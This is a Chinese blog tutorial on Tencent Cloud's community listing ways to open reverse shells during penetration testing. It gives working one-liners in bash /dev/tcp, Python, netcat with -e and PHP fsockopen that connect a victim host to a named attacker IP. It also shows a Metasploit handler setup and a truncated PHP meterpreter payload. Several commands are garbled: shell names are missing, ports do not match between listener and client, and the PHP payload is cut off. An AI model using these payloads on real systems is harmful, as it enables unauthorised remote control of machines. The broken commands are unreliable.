前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试中弹shell的多种方式

渗透测试中弹shell的多种方式

作者头像
逍遥子大表哥
发布2021-12-17 19:58:11
4850
发布2021-12-17 19:58:11
举报
文章被收录于专栏:kali blogkali blog

在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。

我们先来讲一下什么是正向连接和反向连接。

正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢

目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境

攻击机:Kali Linux :47.98.229.211

受害机:Centos 7 :149.129.68.117(阿里云服务器)

姿势一

也是最常见的一种方式

Kali监听

代码语言:javascript
复制
nc -lvvp 4444

centos运行

代码语言:javascript
复制
  -i >& /dev/tcp/47.98.229.211/5555 0>&1

执行命令后,成功得到反弹!

姿势二 python

攻击机Kali还是监听

代码语言:javascript
复制
nc -lvvp 5555

centos执行

代码语言:javascript
复制
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ ","-i"]);'
如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell

攻击机监听

代码语言:javascript
复制
nc -lvvp 5555

目标机器执行

代码语言:javascript
复制
nc 47.98.229.211 5555 -t -e /bin/ 

这样会把目标机的/bin/ 反弹给攻击机

但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式

姿势四 php 攻击机监听

代码语言:javascript
复制
nc -lvvp 4444

要求目标机器有php然后执行

代码语言:javascript
复制
php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

其他的一些高能操作

关于PHP的payload

现在msfconsole中进行简单的配置

代码语言:javascript
复制
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107

PHP

代码语言:javascript
复制
<?
php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) {
{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_
strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s
>
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 姿势一
  • 姿势二 python
  • 关于PHP的payload
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档